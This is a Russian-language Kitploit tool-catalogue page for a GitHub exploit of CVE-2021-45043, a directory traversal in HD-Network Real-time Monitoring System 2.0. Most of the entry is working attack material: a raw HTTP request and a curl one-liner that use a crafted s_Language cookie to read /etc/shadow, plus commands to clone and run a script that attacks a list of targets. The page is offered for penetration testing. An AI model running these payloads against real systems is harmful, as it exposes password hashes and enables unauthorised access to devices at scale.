Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2021-45043 — HD-Network Real-time Monitoring System 2.0 позволяет обход каталога ../ для чтения /etc/shadow через параметр /language/lang s_Language. | Kitploit
Инструменты/GitHubGitHub/crypt0g30rgy/cve-2021-45043
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubcrypt0g30rgy/cve-2021-45043

cve-2021-45043

HD-Network Real-time Monitoring System 2.0 позволяет обход каталога ../ для чтения /etc/shadow через параметр /language/lang s_Language.

Репозиторий
1114 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

cve-2021-45043

HD-Network Real-time Monitoring System 2.0 позволяет обход каталога с помощью ../ для чтения /etc/shadow через параметр s_Language в /language/lang.

первоначальный пост

https://cyberguy0xd1.medium.com/my-cve-2021-45043-lfi-write-up-441dad30dd7f

эксплуатация через Burp

GET /language/lang HTTP/1.1 Host: IP.target Cookie: s_Language=../../../../../../../../../../../../../../etc/shadow

эксплуатация одной строкой

curl -k -s -H "Cookie: s_Language=../../../../../../../../../../../../../../etc/shadow" -X GET http://IP.target/language/lang

массовая эксплуатация целей

git clone https://github.com/g30rgyth3d4rk/cve-2021-45043.git

cd cve-2021-45043/

chmod +x script.sh

./script.sh targets.txt

Скачать инструмент